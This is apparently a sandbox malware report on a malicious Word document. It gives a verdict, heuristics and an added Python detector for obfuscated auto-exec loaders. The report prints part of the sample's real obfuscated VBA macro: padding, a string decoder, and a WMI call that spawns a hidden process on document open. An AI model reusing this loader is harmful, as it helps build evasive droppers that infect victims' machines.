Verdict: MALICIOUS
Risk Score: 262
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The file contains heavily obfuscated VBA macros with a Document_Open auto-exec entry point that hands control to the loader routine. Most of the macro body is padding: loops of string and arithmetic assignments to variables that are never read, placed between the few statements that do anything. The operative statements visible in the preview are a GetObject call whose argument is produced by a custom string decoder (SjQSOd), a .Get() call on the object it returns, a SpawnInstance_ call, and ShowWindow = 0. Dropping every other character from the two encoded arguments yields winmgmts:\\.\root\cimv2 and Win32_ProcessStartup, i.e. the WMI pattern for launching a process with a hidden window. The command line that process would run is not in the visible part of the macro, so the download-and-execute stage is inferred from the shell/download tokens in the compiled p-code rather than observed in source. ClamAV independently classifies the file as a document dropper.
Heuristics (7)

- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
- medium OLE_VBA_MACROS: Document contains VBA macro code (4 related findings)
- critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Obfuscated auto-exec VBA loader. Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- high OLE_VBA_DOCOPEN: Document_Open macro (runs as soon as the document is opened with macros enabled)
- high OLE_VBA_GETOBJ: GetObject call (here the decoded argument is a winmgmts: moniker, so the loader reaches WMI without any CreateObject call appearing in the source)
- high OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in ordinary Office documents, not a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56836 bytes | a59c596b2846abd4d1ccb7f3ac649426b815e8193119c818e89e581327cb23d6 |

Preview of macros.bas (first 1,000 lines of the extracted script; truncated below):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TMxvI(VTmBmLb As String, FJtncc As String, vUnvtj As String, HeycP As String, NFizO As String, LRJPkMe As String)
For XBYzeL = 0 To 194
aydux = "SR#J%zQEPkxw_EC_T(c" + "cOkc#wt].kN" + "AzD)T&XjlheCv^m[Ld"
fSlXK = Left("XndQiuD@?uS_WdAe", 4)
aydux = StrReverse("s]nxO$yZ[XYSVz")
mMQNurUb = 1314 + 1697 + 861
JnbMpav = StrReverse("(h)Fw[axEcgkY")
hLxuFYJO = UCase("@&Bi]!Nt&d]DYd")
aydux = "nYA_p#tHc)yALB" + "bPo?jubTZr-]Rcn" + "kPCHzxfFB-!F"
fSlXK = RTrim("yQiYw*)uYfWE")
pSoJTqYE = UCase("FsPS@g$dh)Q")
VGIgt = RTrim("w&BgVR[*gER&XWkyS")
Next XBYzeL
szAzrRUQ = Left("Ukrsi%q.MWn^uXzoodN", 5)
hLxuFYJO = 839 - 1899 - 1879
PDXZIXJ = 270 - 1437 - 723
mMQNurUb = "^NP@lv&[T?" + ".JrX*nR$ipQ*ia" + "Cud]E$VIzE!V?^] hSQI"
JnbMpav = StrReverse("U]NcXFnDUgDn-x")
PDXZIXJ = Space(15)
aydux = Space(2)
Set ruhTFms = GetObject(SjQSOd("wsi%n-mzg]m*tHsU:B\r\w.i\_rEoYo tr\Pc*ijmHvt2#"))
aydux = StrReverse("e^[q!(oYac@cwKI*")
hLxuFYJO = Right("naABfLc!GWqKLMTcuyQl", 2)
JnbMpav = UCase("jms[fiu.H KXbiO*")
JnbMpav = RTrim("#dxytQCNZ_xXs")
FkxmtZv = Space(2)
szAzrRUQ = Space(15)
hLxuFYJO = 1866 + 785 + 988
While Lfqutn < 217
mMQNurUb = LTrim("^vEKi(hCqkHTnjF")
YltcGz = LTrim(" VmJMD?MdSw)NOojX#")
FkxmtZv = "rxOQ)bwzy?nc" + ".(*k GTCq@^^O" + "_p] BvTFq&vu[cJ"
VGIgt = "rUroBw?Pw@fNwmoPidH" + "PH.TXs$OiHWD)FVh [" + "pE_ZbVFjHI[EfgCy&"
fSlXK = "b-m.o*)I$y" + "y YJo-Lbn&RRs.V!" + "tvdK(zWQ!#SiR"
szAzrRUQ = Space(4)
FkxmtZv = Left("YW zjhR@ghkn", 2)
nuKqm = 1215 - 1897 - 1579
pSoJTqYE = Space(13)
mMQNurUb = RTrim("eUxk[V n[XN$$]@A")
Lfqutn = Lfqutn + 1
Wend
Set LFWzZJ = ruhTFms.Get(SjQSOd("W-iunl3&2W_%PTr$oXc.e sTsYS%tNaCrOtMugp."))
fSlXK = LTrim("g#!Kb*)GOCRivdNv*V")
hLxuFYJO = Right("#dFlSDNycb*&Jb", 2)
JnbMpav = 847 + 1305 + 1210
JnbMpav = Space(8)
VGIgt = RTrim("VEeimfQlzqm?gzwddp-q")
hLxuFYJO = Right("Y#FTgC^CB-l#yDHON", 4)
JnbMpav = Space(3)
aydux = "hb%nptVK_eZCd!bOu" + "hWw)cHGNDfZdlqRG@e-" + "GdC$$AiRwaf"
Set USRZu = LFWzZJ.SpawnInstance_
PDXZIXJ = Space(13)
aydux = Right("S!TxaOqV#*.Bo^(", 3)
While FZsTQN < 219
fSlXK = Left("*WeJ)s^tCqObJ]]b", 3)
VGIgt = 1494 - 1152 - 727
szAzrRUQ = 566 + 1282 + 1323
pSoJTqYE = Left("KoJR[%FGz yXalx", 2)
VGIgt = Left("iWC*[_vDi&)MswP", 4)
VGIgt = 423 - 395 - 1994
FZsTQN = FZsTQN + 2
Wend
aydux = UCase("EJye]fYXSBld#S")
YltcGz = UCase("CKWJbrD)kXbr^JzSMm")
fSlXK = 1339 + 1711 + 432
VGIgt = StrReverse("eJT@-(jcww%iEfqDu")
For pZbCrX = 0 To 381
nuKqm = StrReverse("skQL]xHWfa")
hLxuFYJO = UCase("BFlcG%p$Sble")
Next pZbCrX
USRZu.ShowWindow = 0
JnbMpav = StrReverse("t?ZE#Qo?El_v)YVXB")
While LJGjUG < 315
fSlXK = StrReverse("wLQI$dAX#G^Ny@XI#F!")
PDXZIXJ = Left("sHvOBuzh(tEaZ]kZgd%", 4)
hLxuFYJO = "LsTqVtpFgSMNMQ*" + "@PmeGX?a%FmmBLvMGZ" + "Vvai RRLLijbT-QVEq"
FkxmtZv = Left("evi_bPOo$wp", 3)
fSlXK = UCase("$OQ#lcr&NFkHj[zH([Q")
LJGjUG = LJGjUG + 2
Wend
While djvMAp < 199
hLxuFYJO = 1790 + 1226 + 744
mMQNurUb = 360 + 1603 + 529
szAzrRUQ = Right("dsi*oY?&CcM", 3)
djvMAp = djvMAp + 3
Wend
hLxuFYJO = RTrim("zyS!LesQhKJy#C^")
aydux = 179 - 459 - 218
aydux = Space(1)
JnbMpav = UCase("VYsI*zly^#QMCXyi")
For PQQMri = 0 To 284
mMQNurUb = UCase("ZnoFh#KdUsefcq%")
YltcGz = LTrim("()Ol[JJ.n.[?u@")
Next PQ
... (truncated)
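As an added example (not the analyzer's own code and not the sample's decoder), the Python below applies the logic of the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding to the lines visible in the preview above: it locates auto-exec entry points, finds COM/WMI sinks whose argument is a user-defined function wrapped around a string literal, and tries a few junk-removal transforms on that literal, keeping a result only if it looks like a COM/WMI indicator. The body of SjQSOd is not in the preview, so the stride-based transforms are an assumption that happens to fit these two literals; the MACRO_SAMPLE is constructed from lines copied from the preview plus a Document_Open stub added here.

```python
"""Recover the COM/WMI strings an obfuscated VBA loader passes to its sinks.

Added example for this report, not code from the analyzer. The real decoder
(SjQSOd) is not in the preview, so a small family of junk-removal transforms
is tried and a result is kept only if it looks like a COM/WMI indicator.
"""
import json
import re
from typing import Optional, Tuple

# Constructed sample: the decoy loop, the two sink lines, SpawnInstance_ and
# the ShowWindow assignment are copied from the macro preview in this report;
# the Document_Open stub that calls the loader is filler added here.
MACRO_SAMPLE = r'''
Private Sub TMxvI(VTmBmLb As String, FJtncc As String)
For XBYzeL = 0 To 194
aydux = "SR#J%zQEPkxw_EC_T(c" + "cOkc#wt].kN" + "AzD)T&XjlheCv^m[Ld"
Next XBYzeL
Set ruhTFms = GetObject(SjQSOd("wsi%n-mzg]m*tHsU:B\r\w.i\_rEoYo tr\Pc*ijmHvt2#"))
Set LFWzZJ = ruhTFms.Get(SjQSOd("W-iunl3&2W_%PTr$oXc.e sTsYS%tNaCrOtMugp."))
Set USRZu = LFWzZJ.SpawnInstance_
USRZu.ShowWindow = 0
End Sub
Private Sub Document_Open()
TMxvI "x", "y"
End Sub
'''

# Auto-exec entry points Office runs once macros are enabled.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b',
    re.IGNORECASE | re.MULTILINE,
)

# A COM/WMI sink whose argument is a user function wrapped around a string
# literal: the shape that keeps the real moniker out of the macro source.
SINK_RE = re.compile(
    r'(?P<sink>\bGetObject|\bCreateObject|\bShell|\.Get)\s*\(\s*'
    r'(?P<decoder>[A-Za-z_]\w*)\s*\(\s*"(?P<lit>[^"]*)"',
    re.IGNORECASE,
)

# What a successful decode of a sink argument tends to look like.
INDICATOR_RE = re.compile(
    r'winmgmts:|\bWin32_\w+|WScript\.Shell|Shell\.Application|'
    r'Scripting\.FileSystemObject|https?://|powershell|\bcmd(?:\.exe)?\b',
    re.IGNORECASE,
)


def candidate_decodes(lit: str) -> dict:
    """Assumed junk-removal transforms to try; the label names the transform."""
    cands = {}
    for stride in (2, 3):
        for offset in range(stride):
            cands[f"stride {stride}, offset {offset}"] = lit[offset::stride]
    cands["reversed"] = lit[::-1]
    return cands


def recover(lit: str) -> Optional[Tuple[str, str]]:
    """Return (transform, decoded) for the first candidate that yields an indicator."""
    for name, text in candidate_decodes(lit).items():
        if INDICATOR_RE.search(text):
            return name, text
    return None


def analyze(src: str) -> dict:
    """Report auto-exec entry points, wrapped sink arguments and what they decode to."""
    autoexec = [m.group(1) for m in AUTOEXEC_RE.finditer(src)]
    sinks = []
    for m in SINK_RE.finditer(src):
        rec = recover(m.group("lit"))
        sinks.append({
            "sink": m.group("sink").lstrip("."),
            "decoder": m.group("decoder"),
            "literal": m.group("lit"),
            "transform": rec[0] if rec else None,
            "recovered": rec[1] if rec else None,
        })
    # Win32_ProcessStartup.ShowWindow = 0 hides the window of the spawned process.
    hidden_window = re.search(r'\.ShowWindow\s*=\s*0\b', src) is not None
    if autoexec and any(s["recovered"] for s in sinks):
        verdict = "obfuscated-autoexec-loader"
    elif autoexec and sinks:
        verdict = "autoexec-with-wrapped-sink-argument"
    else:
        verdict = "no-loader-shape"
    return {"autoexec": autoexec, "sinks": sinks,
            "hidden_window": hidden_window, "verdict": verdict}


if __name__ == "__main__":
    print(json.dumps(analyze(MACRO_SAMPLE), indent=2))
```

The transform list is deliberately small: the point is not to reverse every custom decoder but to show that a sink argument produced by a wrapper function is itself the signal, and that a cheap decode attempt is enough to turn the two opaque literals into a winmgmts: moniker and a Win32_ProcessStartup class name that a reviewer can act on.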